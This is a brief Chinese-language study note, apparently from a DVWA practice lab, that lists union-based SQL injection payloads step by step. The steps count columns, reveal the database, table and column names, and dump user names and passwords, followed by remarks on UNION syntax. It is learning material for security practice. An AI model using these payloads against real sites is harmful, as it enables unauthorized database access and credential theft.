0.暴字段数:
1’ order by 3#
1.暴库:查询database,
1' union select 1,database()#
2.暴表名:查询table_name,
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')#
3.暴字段名:
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='guestbook')#
4.暴字段值:
1' union select 1,(select group_concat(User,Password) from users)#
这里需要注意的点是sql语法的一个点,union用于连接两个sql语句,and用于条件的连接,语义上一样容易混淆。还有一点就是union的连接必须要保证字段值一致,所以我用1充当位置,union不同于join这也是一个注意点
